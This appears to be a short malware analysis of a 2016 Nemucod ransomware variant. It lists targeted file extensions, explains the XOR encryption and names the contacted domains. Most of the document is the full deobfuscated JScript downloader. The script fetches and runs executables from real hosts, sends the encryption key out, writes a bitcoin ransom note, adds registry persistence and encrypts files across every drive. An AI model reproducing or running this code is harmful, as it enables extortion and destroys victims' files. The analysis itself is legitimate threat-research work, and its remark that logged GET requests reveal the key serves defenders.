Nemucod 28/Apr/2016

Run Settings
LanguagePlaintext
Quick analysis of a new variant of Nemucod retrieved by ReaQta (https://reaqta.com): 43 new extensions have been added: .3gp, .ai, .arc, .arj, .asf, .backup, .bak, .bz, .bz2 .bza, .bzip, .bzip2, .class, .djvu, .fb2, .flv, .gzip .h, .ice, .img, .iso, .java, .jpeg, .m3u, .mid, .midi .mkv, .mov, .mp3, .ogg, .pl, .pps, .py, .r00, .r01, .r02 .r03, .rm, .sql, .svg, .vob, .wav, .wma For a total of 122 (as opposed to the 79 of the version analysed a few days ago: https://reaqta.com/2016/04/nemucod-meets-7zip-to-launch-ransomware/). The new encryption routine works by taking as input the file to encrypt and a 36 alphanumeric string, the encryption is carried out using a custom xorer that XORs the first 1024 bytes of each targeted file. The key string is randomly generated, as opposed to the previous version where the key was hardcoded, and 7-zip is not used anymore. Even in this case if your firewall is logging GET requests, you'll be able to retrieve the key and decrypt back your files. Contacted domains: - blog.jergensthebeautifuldifference.ca - kalyonrobotik.com.tr - sswboiler.com - bucataria-sylviei.ro - revspec.com The deobfuscated Nemucod script is the following: var id = "LZIA9RQrgNju4fIBD7Z7HLghYohpv_GHeXSRTZSWHVbdZ__-IEZqqmzDJdhUezH8P7DntEc_2GdmdhBl"; var ad = "1BsodiwfVRwnuniEGsPpaD8Xx1BcxDEFpX"; var bc = "0.46682"; var ld = 0; var ky = Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9); var cq = String.fromCharCode(34); var cs = String.fromCharCode(92); var ll = ["blog.jergensthebeautifuldifference.ca", "kalyonrobotik.com.tr", "sswboiler.com", "bucataria-sylviei.ro", "revspec.com"]; var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a"; var xo = WScript.CreateObject("Msxml2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var fo = WScript.CreateObject("Scripting.FileSystemObject"); if (!fo.FileExists(fn + ".txt")) { for (var n = 0; n <= 2; n++) { for (var i = ld; i < ll.length; i++) { var dn = 0; try { xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&rnd=" + i + n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.saveToFile(fn + n + ".exe", 2); if (n != 0) { try { ws.Run(fn + n + ".exe", 1, 0); } catch (er) {}; }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) {}; }; }; if (fo.FileExists(fn + "0.exe")) { xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=start", false); xo.send(); var fp = fo.CreateTextFile(fn + ".txt", true); fp.WriteLine("ATTENTION!"); fp.WriteLine(""); fp.WriteLine("All your documents, photos, databases and other important personal files"); fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key."); fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins)."); fp.WriteLine("Please follow this manual:"); fp.WriteLine(""); fp.WriteLine("1. Create Bitcoin wallet here:"); fp.WriteLine(""); fp.WriteLine(" https://blockchain.info/wallet/new"); fp.WriteLine(""); fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:"); fp.WriteLine(""); fp.WriteLine(" https://localbitcoins.com/buy_bitcoins"); fp.WriteLine(""); fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:"); fp.WriteLine(""); fp.WriteLine(" " + ad); fp.WriteLine(""); fp.WriteLine("4. Open one of the following links in your browser to download decryptor:"); fp.WriteLine(""); for (var i = 0; i < ll.length; i++) { fp.WriteLine(" http://" + ll[i] + "/counter/?a=" + ad); }; fp.WriteLine(""); fp.WriteLine("5. Run decryptor to restore your files."); fp.WriteLine(""); fp.WriteLine("PLEASE REMEMBER:"); fp.WriteLine(""); fp.WriteLine(" - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES."); fp.WriteLine(" - Nobody can help you except us."); fp.WriteLine(" - It`s useless to reinstall Windows, update antivirus software, etc."); fp.WriteLine(" - Your files can be decrypted only after you make payment."); fp.WriteLine(" - You can find this manual on your desktop (DECRYPT.txt)."); fp.Close(); ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0); ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0); ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0); ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0); ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0); for (var i = 67; i <= 90; i++) { ws.Run("%COMSPEC% /c for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN " + cq + "%i" + cq + " " + cq + "%~nxi.crypted" + cq + " & call " + fn + "0.exe " + cq + "%i.crypted" + cq + " " + ky + ")", 0, 1); }; ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0); xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=done", false); xo.send(); }; };
Editor Settings
Theme
Key bindings
Full width
Lines